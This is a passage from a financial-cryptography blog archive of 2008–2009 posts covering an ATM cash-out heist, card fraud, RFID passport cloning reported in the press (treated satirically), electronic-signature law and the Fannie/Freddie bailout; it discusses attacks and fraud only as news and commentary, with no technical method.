    with respect to feedback processes ... I (Lynn) had done a lot with dynamic adaptive (feedback) control algorithms as an undergraduate in the 60s ... which was used in some products shipped in the 70s & 80s. In theearly 80s, I had a chance to meet John Boyd and sponsor his briefings. I found quite a bit of affinity to John's OODA-loop concept (observe, orient, decide, act) that is now starting to be taught in some MBA programs.

    Posted by iang at 06:51 PM | Comments (3) | TrackBack

    February 13, 2009

    this one's significant: 49 cities in 30 minutes!

    No, not this stupidity: "The Breach of All Breaches?" but this one, spotted by JP (and also see Fraud, Phishing and Financial Misdeeds, scary, flashmob, and fbi wanted poster seen to right):

    * Reported by John Deutzman

    Photos from security video (see photo gallery at left at bottom right) obtained by Fox 5 show of a small piece of a huge scam that took place all in one day in a matter of hours. According to the FBI , ATMs from 49 cities were hit -- including Atlanta, Chicago, New York, Montreal, Moscow and Hong Kong.

    "We've seen similar attempts to defraud a bank through ATM machines but not, not anywhere near the scale we have here," FBI Agent Ross Rice told Fox 5.
    ....

    "Over 130 different ATM machines in 49 cities worldwide were accessed in a 30-minute period on November 8," Agents Rice said. "So you can get an idea of the number of people involved in this and the scope of the operation."

    Here is the amazing part: With these cashers ready to do their dirty work around the world, the hacker somehow had the ability to lift those limits we all have on our ATM cards. For example, I'm only allowed to take out $500 a day, but the cashers were able to cash once, twice, three times over and over again. When it was all over, they only used 100 cards but they ripped off $9 million.

    This lifts the level of capability of the attacker several notches up. This is a huge coordinated effort. Are we awake now to the problems that we created for ourselves a decade ago?

    (Apologies, no time to do the real research and commentary today! Thanks, JP!)

    Posted by iang at 08:25 AM | Comments (0) | TrackBack

    January 30, 2009

    Brit Frauds, the Bezzle, and Signs of Rebellion in Heartland

    Payments fraud seems up in Britain:

    Matters found that around 26% fell victim to card fraudsters in 2008, up five per cent on the previous year.

    Kerry D'Souza, card fraud expert, CPP, says: "The dramatic increase in card fraud shows no sign of abating which isn't surprising given the desperate measures some people will resort to during the recession."

    The average sum fraudulently transacted is over £650, with one in 20 victims reporting losses of over £2000. Yet 42% of victims did not know about these transactions and only found out they had been defrauded when alerted by their bank.

    Online fraud affected 39% of victims, while card cloning from a cash point or chip and pin device accounted for a fifth of cases. Out of all cards that are physically lost and stolen, one in ten are also being used fraudulently.

    One in 4 sounds quite high. That's a lot higher than one would expect. So either fraud has been running high and only now are better figures available, or it is growing? They say it is growing.

    While researching origins of failure I came across this interesting snippet the other day from Richard Veryard:

    The economist J.K Gailbraith used the term "bezzle" to denote the amount of money siphoned (or "embezzled") from the system. In good times, he remarked, the bezzle rises sharply, because everyone feels good and nobody notices. "In [economic] depression, all this is reversed. Money is watched with a narrow, suspicious eye. The man who handles it is assumed to be dishonest until he proves himself otherwise. Audits are penetrating and meticulous. Commercial morality is enormously improved. The bezzle shrinks." [Galbraith, The Great Crash 1929]

    If this is true, then likely people will be waking up and demanding more from the payments infrastructure. No more easy money for them. Signs of this were spotted by Lynn:

    "Up to this point, there has been no information sharing, thus empowering cyber criminals to use the same or slightly modified techniques over and over again. I believe that had we known the details about previous intrusions, we might have found and prevented the problem we learned of last week."

    Heartland's goal is to turn this event into something positive for the public, the financial institutions which issue credit/debit cards and payments processors.

    Carr concluded, "Just as the Tylenol(R) crisis engendered a whole new packaging standard, our aspiration is to use this recent breach incident to help the payments industry find ways to protect its data - and therefore businesses and consumers - much more effectively."

    For the past year, Carr has been a strong advocate for industry adoption of end-to-end encryption - which protects data at rest as well as data in motion - as an improved and safer standard of payments security. While he believes this technology does not wholly exist on any payments platform today, Heartland has been working to develop this solution and is more committed than ever to deploying it as quickly as possible.

    Now, if you've read Lynn's rants on naked transactions, you will know exactly what this person is asking for. And you might even have a fair stab at why the payment providers denied Heartland that protection.

    Posted by iang at 05:48 AM | Comments (0) | TrackBack

    January 26, 2009

    WoW crosses GP: get rich quick in World of Warcraft

    SecretSquirrel writes:

    it's a "get rich quick" guide for sale ... but actually for the virtual money inside the WoW game

    Around a year or two ago I penned a series of rants called "GP" which predicted that the primary success signal of a new money was ... crime! The short summary is that in the battle for mindspace between issuers, users, critics & regulators, the press (who?) the offended and the otherwise religious ... there is no way for the external observer to figure out whether this is worthwhile or not.

    But wait, there is one way: if a criminal is willing to put his time, his investment, indeed his very freedom on the line for something, it's got to be worth something! GP is undeniably crossed, I theorise, when criminals steal the value, and therefore provide a most valuable signal to the world that this stuff is worth something.

    (it's not a parody!)

    it's exactly following the format to the line, of any of the famous get-rich-quick newsletters.

    (eg, http://www.landingpagecashmachine.com or hundreds of others) ... even the famous "three-line centered upper-lower case headline"

    Call me cynical, but I have seen hundreds of digital cash systems live and die without meriting a second thought. There have been thousands I haven't seen! In my decade++ of time in this field, I've only seen one external signal that is reliable. Even this:

    You know they say WoW is over $150 million per month in player fees now!

    Is ... well, ya know, could be a fake. Did we see that Satyam, a huge audited IT outsourcing firm in India added some 13,000 jobs ... and nobody noticed?

    If I am right, I'll also be blamed for the upsurge in fake crimes :)

    Posted by iang at 11:49 PM | Comments (1) | TrackBack

    January 21, 2009

    Royal Bank of Scotland Falls 66% in One Day!

    Hasan points to this:

    Remember just over one year ago? RBS (Royal Bank of Scotland) paid $100bn for ABN Amro.

    For this amount it could now buy:

    • Citibank $22.5bn
    • Morgan Stanley $10.5bn
    • Goldman Sachs $21bn
    • Merrill Lynch $12.3bn
    • Deutsche Bank $13bn
    • Barclays $12.7bn

    And still have $8bn in change with which you would be able to pick up:

    GM, Ford, Chrysler and the Honda Formula 1 Racing-Team.

    Posted by iang at 09:14 AM | Comments (3) | TrackBack

    January 16, 2009

    What's missing in security: business

    Those of us who are impacted by the world of security suffer under a sort of love-hate relationship with the word; so much of it is how we build applications, but so much of what is labelled security out there in the rest of the world is utter garbage.

    So we tend to spend a lot of our time reverse-engineering popular security thought and finding the security bugs in it. I think I've found another one. Consider this very concise and clear description from Frank Stajano, who has published a draft book section seeking comments:

    The viewpoint we shall adopt here, which I believe is the only one leading to robust system security engineering, is that security is essentially risk management. In the context of an adversarial situation, and from the viewpoint of the defender, we identify assets (things you want to protect, e.g. the collection of magazines under your bed), threats (bad things that might happen, e.g. someone stealing those magazines), vulnerabilities (weaknesses that might facilitate the occurrence of a threat, e.g. the fact that you rarely close the bedroom window when you go out), attacks (ways a threat can be made to happen, e.g. coming in through the open window and stealing the magazines—as well as, for good measure, that nice new four-wheel suitcase of yours to carry them away with) and risks (the expected loss caused by each attack, corresponding to the value of the asset involved times the probability that the attack will occur). Then we identify suitable safeguards (a priori defences, e.g. welding steel bars across the window to prevent break-ins) and countermeasures (a posteriori defences, e.g. welding steel bars to the window after a break-in has actually occurred4 , or calling the police). Finally, we implement the defences that are still worth implementing after evaluating their effectiveness and comparing their (certain) cost with the (uncertain) risk they mitigate5

    (my emphasies.) That's a good description of how the classical security world sees it. We start by saying, "What's your threat model?" Then out of that we build a security model to deal with those threats. The security model then incorporates some knowledge of risks to manage the tradeoffs.

    The bit that's missing is the business. Instead of asking "What's your threat model?" as the first question, it should be "What's your business model?" Security asks that last, and only partly, by asking questions like "what's are the risks?"

    Calling security "risk management" then is a sort of nod to the point that security has a purpose within business; and by focussing on some risks, this allows the security modellists to preserve their existing model while tying it to the business. But it is still backwards; it is still seeking to add risks at the end, and will still result in "security" being just the annoying monkey on the back.

    Instead, the first question should be "What's your business model?"

    This unfortunately opens Pandora's box, because that implies that we can understand a business model. Assuming it is the case that your CISO understands a business model, it does rather imply that the only security we should be pushing is that which is from within. From inside the business, that is. The job of the security people is not therefore to teach and build security models, but to improve the abilities of the business people to incorporate good security as they are doing their business.

    Which perhaps brings us full circle to the popular claim that the best security is that which is built in from the beginning.

    Posted by iang at 03:51 AM | Comments (4) | TrackBack

    December 07, 2008

    Unwinding secrecy -- how to do it?

    The next question on unwinding secrecy is how to actually do it. It isn't as trivial as it sounds. Perhaps this is because the concept of "need-to-know" is so well embedded in the systems and managerial DNA that it takes a long time to root it out.

    At LISA I was asked how to do this; but I don't have much of an answer. Here's what I have observed:

    • Do a little at a time.
    • Pick a small area and start re-organising it. Choose an area where there is lots of frustration and lots of people to help. Open it up by doing something like a wiki, and work the information. It will take a lot of work and pushing by yourself, mostly because people won't know what you are doing or why (even if you tell them).
    • What is needed is a success. That is, a previously secret area is opened up, and as a result, good work gets done that was otherwise inhibited. People need to see the end-to-end journey in order to appreciate the message. (And, obviously, it should be clear at the end of it that you don't need the secrecy as much as you thought.)
    • Whenever some story comes out about a successful opening of secrecy, spread it around. The story probably isn't relevant to your organisation, but it gets people thinking about the concept. E.g., that which I posted recently was done to get people thinking. Another from Chandler.
    • Whenever there is a success on openness inside your organisation, help to make this a showcase (here are three). Take the story and spread it around; explain how the openness made it possible.
    • When some decision comes up about "and this must be kept secret," discuss it. Challenge it, make it prove itself. Remind people that we are an open organisation and there is benefit in treating all as open as possible.
    • Get a top-level decision that "we are open." Make it broad, make it serious, and incorporate the exceptions. "No, we really are open; all of our processes are open except when a specific exception is argued for, and that must be documented and open!" Once this is done, from top-level, you can remind people in any discussion. This might take years to get, so have a copy of a resolution in your back pocket for a moment when suddenly, the board is faced with it, and minded to pass a broad, sweeping decision.
    • Use phrases like "security-by-obscurity." Normally, I am not a fan of these as they are very often wrongly used; so-called security-by-obscurity often tans the behinds of supposed open standards models. But it is a useful catchphrase if it causes the listener to challenge the obscure security benefits of secrecy.
    • Create an opening protocol. Here's an idea I have seen: when someone comes across a secret document (generally after much discussion ...) that should not have been kept secret, let them engage in the Opening-Up Protocol without any further ado. Instead of grumbling or asking, put the ball in their court. Flip it around, and take the default as to be open:
      "I can't see why document X is secret, it seems wrong. Therefore, in 1 month, I intend to publish it. If there is any real reason, let me know before then."
      This protocol avoids the endless discussions as to why and whether.

    Well, that's what I have thought about so far. I am sure there is more.

    Posted by iang at 01:24 PM | Comments (0) | TrackBack

    September 21, 2008

    Why hasn't eBay tanked?

    I have a curious question: why hasn't eBay's share price plummeted? Also, to a lesser extent, those of amazon and google who also depend on a robust retail sales trade.

    My theory is this: when cash dries up, or in USA terms, credit, then people stop buying, and start to save. Last week, apparently, the credit spigot was not only tightened, it was turned off and padlocked! Rumours circulated of consumer credit disappearing before ones very eyes.

    So, surely this should effect the consumer markets, and especially those who are more likely to be in rarities rather than rice. Hence, eBay.

    Anecdotally, I've been watching a particular class of out-of-date, dead-tech items over the last 2 months. 2 months ago, they were going for around $200-300. Last week I saw offers hovering around $100, but, surprisingly, one went for $300, another for $250.

    This weekend, I'm watching two offers with zero bids, days into their auctions, and heading towards giveaway prices.

    This is great news for me, if I can pick them up for shipping costs. But what's the news for the US economy and the retailers? Hence the question: is eBay likely to weather a collapse in auctions and retail sales? Are amazon and google to follow?

    Posted by iang at 10:21 PM | Comments (7) | TrackBack

    August 25, 2008

    Should a security professional have a legal background?

    Graeme points to this entry that posits that security people need a legal background:

    My own experience and talking to colleagues has prompted me to wonder whether the day has arrived that security professionals will need a legal background. The information security management professional is under increasing pressure to cope with the demands of the organization for access to information, to manage the expectations of the data owner on how and where the information is going to be processed and to adhere to regulatory and legal requirements for the data protection and archiving. In 2008, a number of rogue trader and tax evasion cases in the financial sector have heightened this pressure to manage data.

    The short, sharp answer is no, but it is a little more nuanced than that. First, let's take the rogue trader issue, being someone who has breached the separation of roles within a trading company, and used it to bad effect. To spot and understand this requires two things: an understanding of how settlement works, and the principle of dual control. It does not require the law, at all. Indeed, the legal position of someone who has breached the separation, and has "followed instructions to make a lot of money" is a very difficult subject. Suffice to say, studying the law here will not help.

    Secondly, asking security people to study law so as to deal with tax evasion is equally fruitless but for different reasons: it is simply too hard to understand, it is less law than an everlasting pitched battle between the opposing camps.

    Another way of looking at this is to look at the FC7 thesis, which says that, in order to be an architect in financial cryptography, you need to be comfortable with cryptography, software engineering, rights, accounting, governance, value and finance. The point is not whether law is in there or not, but that there are an awful lot of important things that architects or security directors need before they need law.

    Still, an understanding of the law is no bad thing. I've found several circumstances where it has been very useful to me and people I know:

    • Contract law underpins the Ricardian contract.
    • Dispute resolution underpins the arbitration systems used in sensitive communities (such as WebMoney and CAcert).
    • The ICANN dispute system might have an experienced and realises that touching domains registries can do grave harm. In the alternate, a jurist looking at the system will not come to that conclusion at all.

    In this case, the law knowledge helps a lot. Another area which is becoming more and more an issue is that of electronic evidence. As most evidence is now entering the digital domain (80% was a recent unreferenced claim) there is much to understand here, and much that one can do to save ones company. The problem with this, as lamented at the recent conference, is that any formal course of law includes nothing on electronic evidence. For that, you have to turn to books like those by Stephen Mason on Electronic Evidence. But that you can do yourself.

    Posted by iang at 03:38 PM | Comments (3) | TrackBack

    August 07, 2008

    Osama bin Laden gets a cosmetic makevover in his British Vanity Passport

    cwe points to this new way to improve your passport profile:

    Using his own software, a publicly available programming code, a £40 card reader and two £10 RFID chips, Mr van Beek took less than an hour to clone and manipulate two passport chips to a level at which they were ready to be planted inside fake or stolen paper passports.

    A baby boy’s passport chip was altered to contain an image of Osama bin Laden, and the passport of a 36-year-old woman was changed to feature a picture of Hiba Darghmeh, a Palestinian suicide bomber who killed three people in 2003. The unlikely identities were chosen so that there could be no suggestion that either Mr van Beek or The Times was faking viable travel documents.

    OK, so costs is what we track here at FC-central: we need 60 quid of parts, and let's call it 40 quid for the work. Add to that, a fake or stolen passport, which seems to run to around 100 depending. Call it 200, all-up, for the basic package. The fake may possibly be preferred because you can make it with the right photo inside the jacket, without having to do the professional dicey slicey work. Now that the border people are convinced that the RFID chip is perfectly secure, they won't be looking for that definitively British feel.






    Folks, if you are going to try this at home, use your own passport, because using fake passports is a bit naughty! There are all sorts of reasons to improve ones image, and cosmetics is a booming industry these days. Let's say, we change the awful compulsory taliban image to a studio photo by a professional photographer. Easy relaxed pose, nice smile, and with your favourite Italian holiday scenes in the background. Add some photoshop work to smooth out the excess lines, lighten up those hungover dark eyes, and shrink those tubby parts off. We'll be a hit with the senior citizens.

    We can also improve your hard details: For the 40-somethings, we'll take 10 years taken off your age, and for the teenager, we'll boost you up to 18 or 21. For the junior industry leader, we can add a title or two, and some grey at the side. Would you prefer Sir or Lord?

    Your premium vanity upgrade, with all the trimmings, is likely to set you back around 500, and less if you bring your own base. Think of the savings on gym fees, and all the burgers you can eat!

    One small wrinkle: there is a hint in the article that the British Government is offering these special personality units only until next year. Rush now...




    Posted by iang at 06:38 AM | Comments (8) | TrackBack

    August 06, 2008

    _Electronic Signatures in Law_, Stephen Mason, 2007

    Electronic signatures are now present in legal cases to the extent that while they remain novel, they are not without precedence. Just about every major legal code has formed a view in law on their use, and many industries have at least tried to incorporate them into vertical applications. It is then exceedingly necessary that there be an authoritative tome on the legal issues surrounding the topic.

    Electronic Signatures in Law is such a book, and I'm now the proud owner of a copy of the recent 2007 second edition, autographed no less by the author, Stephen Mason. Consider this a review, although I'm unaccustomed to such. Like the book, this review is long: intro, stats, a description of the sections, my view of the old digsig dream, and finally 4 challenges I threw at the book to measure its paces. (Shorter reviews here.)

    First the headlines: This is a book that is decidedly worth it if you are seriously in the narrow market indicated by the title. For those who are writing directives or legislation, architecting software of reliance, involved in the Certificate Authority business of some form, or likely to find themselves in a case or two, this could well be the essential book.

    At £130 or so, I'd have to say that the Financial Cryptographer who is not working directly in the area will possibly find the book too much for mild Sunday afternoon reading, but if you have it, it does not dive so deeply and so legally that it is impenetrable to those of us without an LLB up our sleeves. For us on the technical side, there is welcome news: although the book does not cover all of the failings and bugs that exist in the use of PKI-style digital signatures, it covers the major issues. Perhaps more importantly, those bugs identified are more or less correctly handled, and the criticism is well-ground in legal thinking that itself rests on centuries of tradition.

    Raw stats: Published by Tottel publishing. ISBN 978-1-84592-425-6. At over 700 pages, it includes a comprehensive indexes of statutory instruments, legislation and cases that runs to 55 pages, by my count, and a further 10 pages on United Kingdom orders. As well, there are 54 pages on standards, correspondents, resources, glossary, followed by a 22 page index.

    Description. Mason starts out with serious treatments on issues such as "what is a signature?" and "what forms a good signature?" These two hefty chapters (119 pages) are beyond comprehensive but not beyond comprehension. Although I knew that the signature was a (mere) mark of intent, and it is the intent which is the key, I was not aware of how far this simple subject could go. Mason cites case law where "Mum" can prove a will, where one person signs for another, where a usage of any name is still a good signature, and, of course, where apparent signatures are rejected due to irregularities, and others accepted regardless of irregularities.

    Next, there is a fairly comprehensive (156 pages) review of country and region legal foundations, covering the major anglo countries, the European Union, and Germany in depth, with a chapter on International comparisons covering approaches, presumptions, liabilities and other complexities and a handful of other countries. Then, Mason covers electronic signatures comprehensively and then seeks to compare them to Parties and risks, liability, non-contractual issues, and evidence (230 pages). Finally, he wraps up with a discussion of digital signatures (42 pages) and data protection (12 pages).

    Let me briefly summarise the financial cryptography view of the history of Digital Signatures: The concept of the digital signature had been around since the mid-1970s, firstly in the form of the writings by the public key infrastructure crowd, and secondly, popularised to a small geeky audience in the form of PGP in the early 1990s. However, deployment suffered as nobody could quite figure out the application.

    When the web hit in 1994, it created a wave that digital signatures were able to ride. To pour cold water on a grand fire-side story, RSA Laboratories manage to convince Netscape that (a) credit cards needed to be saved from the evil Mallory, (b) the RSA algorithm was critical to that need, and (c) certificates were the way to manage the keys required for RSA. Verisign was a business created by (friends of) RSA for that express purpose, and Netscape was happily impressed on the need to let other friends in. For a while everything was mom's apple pie, and we'll all be rich, as, alongside VeriSign and friends, business plans claiming that all citizens would need certificates for signing purposes were floated around Wall Street, and this would set Americans back $100 a pop.

    Neither the fabulous b-plans nor the digital signing dream happened, but to the eternal surprise of the technologists, some legislatures put money down on the cryptographers' dream to render evidence and signing matters "simpler, please." The State of Utah led the way, but the politicians dream is now more clearly seen in the European Directive on Electronic Signatures, and especially in the Germanic attitude that digital signatures are as strong by policy, as they are weak in implementation terms. Today, digital signatures are relegated to either tight vertical applications (e.g., Ricardian contracts), cryptographic protocol work (TLS-style key exchanges), or being unworkable misfits lumbered with the cross of law and the shackles of PKI. These latter embarrassments only survive in those areas where (a) governments have rolled out smart cards for identity on a national basis, and/or (b) governments have used industrial policy to get some of that certificate love to their dependencies.

    In contrast to the above dream of digital signatures, attention really should be directed to the mere electronic signature, because they are much more in use than the cryptographic public key form, and arguably much more useful. Mason does that well, by showing how different forms are all acceptable (Chapter 10, or summarised here): Click-wrap, typing a name, PINs, email addresses, scanned manuscript signatures, and biometric forms are all contrasted against actual cases.

    The digital signature, and especially the legal projects of many nations get criticised heavily. According to the cases cited, the European project of qualified certificates, with all its CAs, smart cards, infrastructure, liabilities, laws, and costs ad infinitum ... are just not needed. A PC, a word processor program and a scan of a hand signature should be fine for your ultimate document. Or, a typewritten name, or the words "signed!" Nowhere does this come out more clearly than the Chapter on Germany, where results deviate from the rest of the world.

    Due to the German Government's continuing love affair with the digital signature, and the backfired-attempt by the EU to regularise the concept in the Electronic Signature Directives, digital and electronic signatures are guaranteed to provide for much confusion in the future. Germany especially mandated its courts to pursue the dream, with the result that most of the German case results deal with rejecting electronic submissions to courts if not attached with a qualified signature (6 of 8 cases listed in Chapter 7). The end result would be simple if Europeans could be trusted to use fax or paper, but consider this final case:

    (h) Decision of the BGH (Federal Supreme Court, 'Bundesgerichtshof') dated 10 October 2006,...: A scanned manuscript signature is not sufficient to be qualified as 'in writing' under §130 VI ZPO if such a signature is printed on a document which is then sent by facsimile transmission. Referring to a prior decision, the court pointed out that it would have been sufficient if the scanned signature was implemented into a computer fax, or if a document was manually signed before being sent by facsimile transmission to court.

    How deliciously Kafkaesque! and how much of a waste of time is being imposed on the poor, untrustworthy German lawyer. Mason's book takes on the task of documenting this confusion, and pointing some of the way forward. It is extraordinarily refreshing to find that the first to chapters, and over 100 pages, are devoted to simply describing signatures in law. It has been a frequent complaint that without an understanding of what a signature is, it is rather unlikely that any mathematical invention such as digsigs would come even close to mimicing it. And it didn't, as is seen in the 118 pages romp through the act of signing:

    What has been lost in the rush to enact legislation is the fact that the function of the signature is generally determined by the nature and content of the document to which it is affixed.

    Which security people should have recognised as a red flag: we would generally not expect to use the same mechanism to protect things of wildly different values.

    Finally, I found myself pondering these teasers:

    Athenticate. I found myself wondering what the word "authenticate" really means, and from Mason's book, I was able to divine an answer: to make an act authentic. What then does "authentic" mean and what then is an "act"? Well, they are both defined as things in law: an "act" is something that has legal significance, and it is authentic if it is required by law and is done in the proper fashion. Which, I claim, is curiously different to whatever definition the technologists and security specialists use. OK, as a caveat, I am not the lawyer, so let's wait and see if I get the above right.

    Burden of Liability. The second challenge was whether the burden of liability in signing has really shifted. As we may recall, one of the selling points of digital signatures was that once properly formed, they would enable a relying party to hold the signing party to account, something which was sometimes loosely but unreliably referred to as non-repudiation.

    In legal terms, this would have shifted the burden of proof and liability from the recipient to the signer, and was thought by the technologists to be a useful thing for business. Hence, a selling point, especially to big companies and banks! Unfortunately the technologists didn't understand that burden and liability are topics of law, not technology, and for all sorts of reasons it was a bad idea. See that rant elsewhere. Still, undaunted, laws and contracts were written on the advice of technologists to shift the liability. As Mason puts it (M9.27 pp270):

    For obvious reasons, the liability of the recipient is shaped by the warp and weft of political and commercial obstructionism. Often, a recipient has no precise rights or obligations, but attempts are made using obscure methods to impose quasi-contractual duties that are virtually impossible to comply with. Neither governments nor commercial certification authorities wish to make explicit what they seek to achieve implicitly: that is, to cause the recipient to become a verifying party, with all the responsibilities that such a role implies....

    So how successful was the attempt to shift the liability / burder in law? Mason surveys this question in several ways: presumptions, duties, and liabilities directly. For a presumption that the sender was the named party in the signature, 6 countries said yes (Israel, Japan, Argentina, Dubai, Korea, Singapore) and one said no (Australia) (M9.18 pp265) Britain used statutory instruments to give a presumption to herself, the Crown only, that the citizen was the sender (M9.27 pp270). Others were silent, which I judge an effective absence of a presumption, and a majority for no presumption.

    Another important selling point was whether the CA took on any especial presumption of correctness: the best efforts seen here were that CAs were generally protected from any liability unless shown to have acted improperly, which somewhat undermines the entire concept of a trusted third party.

    How then are a signer and recipient to share the liability? Australia states quite clearly that the signing party is only considered to have signed, if she signed. That is, she can simply state that she did not sign, and the burden falls on the relying party to show she did. This is simply the restatement of the principle in the English common law; and in effect states that digital signatures may be used, but they are not any more effective than others. Then, the liability is exactly as before: it is up the to relying party to check beforehand, to the extent reasonable. Other countries say that reliance is reasonable, if the relying party checks. But this is practically a null statement, as not only is it already the case, it is the common-sense situation of caveat emptor deriving from Roman times.

    Although murky, I would conclude that the liability and burden for reliance on a signature is not shifted in the electronic domain, or at least governments seem to have held back from legislating any shift. In general, it remains firmly with the recipient of the signature. The best it gets in shiftyville is the British Government's bounty, which awards its citizens the special privilege of paying for their Government's blind blundering; same as it ever was. What most governments have done is a lot of hand-waving, while permitting CAs to utilise contract arrangements to put the parties in the position of doing the necessary due diligence,. Again, same as it ever was, and decidedly no benefit or joy for the relying party is seen anywhere. This is no more than the normal private right to a contract or arrangement, and no new law nor regulation was needed for that.

    Digital Signing, finally, for real! The final challenge remains a work-in-progress: to construct some way to use digital signatures in a signing protocol. That is, use them to sign documents, or, in other words, what they were sold for in the first place. You might be forgiven for wondering if the hot summer sun has reached my head, but we have to recall that most of the useful software out there does not take OpenPGP, rather it takes PKI and x.509 style certificate cryptographic keys and certificates. Some of these things offer to do things called signing, but there remains a challenge to make these features safe enough to be recommended to users. For example, my Thunderbird now puts a digital signature on my emails, but nobody, not it, not Mozilla, not CAcert, not anyone can tell me what my liability is.

    To address this need, I consulted the first two chapters, which lay out what a signature is, and by implication what signing is. Signing is the act of showing intent to give legal effect to a document; signatures are a token of that intention, recorded in the act of signing. In order, then, to use digital certificates in signing, we need to show a user's intent. Unfortunately, certificates cannot do that, as is repeatedly described in the book: mostly because they are applied by the software agent in a way mysterious and impenetrable to the user.

    Of course, the answer to my question is not clearly laid out, but the foundations are there: create a private contract and/or arrangement between the parties, indicate clearly the difference between a signed and unsigned document, and add the digital signature around the document for its cryptographic properties (primarily integrity protection and confirmation of source).

    The two chapters lay out the story for how to indicate intention in the English common law: it is simple enough to add the name, and the intention to sign, manually. No pen and ink is needed, nor more mathematics than that of ASCII, as long as the intention is clear. Hence, it suffices for me to write something like signed, iang at the bottom of my document. As the English common law will accept the addition of merely ones name as a signature, and the PKI school has hope that digital signatures can be used as legal signatures, it follows that both are required to be safe and clear in all circumstances. For the champions of either school, the other method seems like a reduction to futility, as neither seems adequate nor meaningful, but the combination may ease the transition for those who can't appreciate the other language.

    Finally, I should close with a final thought: how does the book effect my notions as described in the Ricardian Contract, still one of the very few strong and clear designs in digital signing? I am happy to say that not much has changed, and if anything Mason's book confirms that the Ricardo designs were solid. Although, if I was upgrading the design, I would add the above logic. That is, as the digital signature remains impenetrable to the court, it behoves to add the words seen below somewhere in the contract. Hence, no more than a field name-change, the tiniest tweak only, is indicated:

    Signed By: Ivan


    Posted by iang at 10:44 AM | Comments (0) | TrackBack

    August 05, 2008

    Monetary affairs on free reign, but the horse has Boulton'd

    The Fed roared into action mid July to rescue IndyMac, one of the USA's biggest banks. It's the normal story: toxic loans, payouts by the government, all accompanied by the USG moving to make matters worse. Chart of the week award goes to James Turk of Goldmoney:

    One of the basic functions of a central bank is to act as the 'lender of last resort'. This facility is used to keep banks liquid during a period of distress.

    For example, if a bank is experiencing a run on deposits, it will borrow from the central bank instead of trying to liquidate some of its assets to raise the cash it needs to meet its obligations. In other words, the central bank offers a 'helping hand' by providing liquidity to the bank in need.

    The following chart is from the Economic Research Department of the St. Louis Federal Reserve Bank. Here is the link: http://research.stlouisfed.org/fred2/series/BORROW. This long-term chart illustrates the amount of money banks have borrowed from the Federal Reserve from 1910 to the present.

    This chart proves there is truth to the adage that a picture is worth a thousand words. It's one thing to say that the present financial crisis is unprecedented, but it is something all together different to provide a picture putting real meaning to the word 'unprecedented'.

    It is an understatement to say that the U.S. banking system is in uncharted territory. The Federal Reserve is providing more than just a 'helping hand'.

    Also check the original so you can see the source!

    The problem with the "basic function" of the poetically-named 'lender of last resort' is that it is more a theory than a working practice. Such a thing has to be proven in action before we can rely on it. Unlike insurance, the lending of last resort function rarely gets proven, so it languishes until found to be broken in our very hour of need. Sadly, that is happening now in Switerland. Over at the Economist they also surveyed the Fed's recent attempts to prove their credibility in the same game. FM & FM were bailed out, and gave the dollar holder a salutory lesson. The mortgage backers were supposed to be private:

    The belief in the implicit government guarantee allowed the pair to borrow cheaply. This made their model work. They could earn more on the mortgages they bought than they paid to raise money in the markets. Had Fannie and Freddie been hedge funds, this strategy would have been known as a “carry trade”.

    It also allowed Fannie and Freddie to operate with tiny amounts of capital. The two groups had core capital (as defined by their regulator) of $83.2 billion at the end of 2007 (see chart 2); this supported around $5.2 trillion of debt and guarantees, a gearing ratio of 65 to one. According to CreditSights, a research group, Fannie and Freddie were counterparties in $2.3 trillion-worth of derivative transactions, related to their hedging activities.

    There is no way a private bank would be allowed to have such a highly geared balance sheet, nor would it qualify for the highest AAA credit rating. In a speech to Congress in 2004, Alan Greenspan, then the chairman of the Fed, said: “Without the expectation of government support in a crisis, such leverage would not be possible without a significantly higher cost of debt.” The likelihood of “extraordinary support” from the government is cited by Standard & Poor’s (S&P), a rating agency, in explaining its rating of the firms’ debt.

    Now, we learn that FM & FM are government-sponsored enterprises, and the US is just another tottering socialist empire. OK, so the Central Bank, Treasury and Congress of the United States of America lied about the status of their subsidised housing economy. Now what? We probably would be wise to treat all other pronouncements with the skepticism due to a fundamentally flawed and now failing central monetary policy.

    The illusion investors fell for was the idea that American house prices would not fall across the country. This bolstered the twins’ creditworthiness. Although the two organisations have suffered from regional busts in the past, house prices have not fallen nationally on an annual basis since Fannie was founded in 1938.

    ... Of course, this strategy only raises another question. Why does America need government-sponsored bodies to back the type of mortgages that were most likely to be repaid? It looks as if their core business is a solution to a non-existent problem.

    Although there is an obvious benefit in paying for good times, there is an obvious downside: you have to pay it back one day, and you pay it back double big in the down times, likely with liberal doses of salt in your gaping wounds. Welcome, Angst!

    We keep coming back to the same old problem in the financial field as with, say, security, which is frequently written about in this blog. So many policies eventually founder on one flawed assumption: that we believe we know how to do it right.

    However, Fannie and Freddie did not stick to their knitting. In the late 1990s they moved heavily into another area: buying mortgage-backed securities issued by others (see chart 3). Again, this was a version of the carry trade: they used their cheap financing to buy higher-yielding assets.

    Why did they drift from the original mission?

    Because they could. Because they were paid on results. Because it was fun. Because, they could be players, they could get some of that esteemed Wall Street respect.

    A thousand likely reasons, none of which are important, because the general truth here is that a subsidy will always turn around and hurt the very people who it intends to help. Washington DC's original intention of providing some nice polite subsidy would and must be warped to come around and bite them. Some day, some way.

    Sometimes the mortgage companies were buying each other’s debt: turtles propping each other up. Although this boosted short-term profits, it did not seem to be part of the duo’s original mission. As Mr Greenspan remarked, these purchases “do not appear needed to supply mortgage market liquidity or to enhance capital markets in the United States”.

    References to the comments of Mr Greenspan are generally to be taken as insider financial code for the real story. Apparently also of Mervyn King, yet, evidently, neither is a wizard who can repair the dam before it breaches, merely farseers who can talk about the spreading cracks.

    Now, the USA housing market gets what it deserves for its hubris. The problems for the rest of us are twofold: it drags everything else in the world down as well, and it is not as if those in the Central Banks, the Congresses, the Administrations or the Peoples of the world will learn the slightest bit of wisdom over this affair. Plan on this happening again in another few decades.

    If you think I jest, you might like to invest in a new book by George Selgin entitled Good Money. Birmingham Button Makers, the Royal Mint, and the Beginnings of Modern Coinage, 1775-1821

    Although it has long been maintained that governments alone are fit to coin money, the story of coining during Great Britain’s Industrial Revolution disproves this conventional belief. In fact, far from proving itself capable of meeting the monetary needs of an industrializing economy, the Royal Mint presided over a cash shortage so severe that it threatened to stunt British economic growth. For several decades beginning in 1775, the Royal Mint did not strike a single copper coin. Nor did it coin much silver, thanks to official policies that undervalued that metal.

    To our great and enduring depression, the lesson of currency shortage was not learnt until after well after the events of the 1930s. The story of Matthew Boulton is salutory:

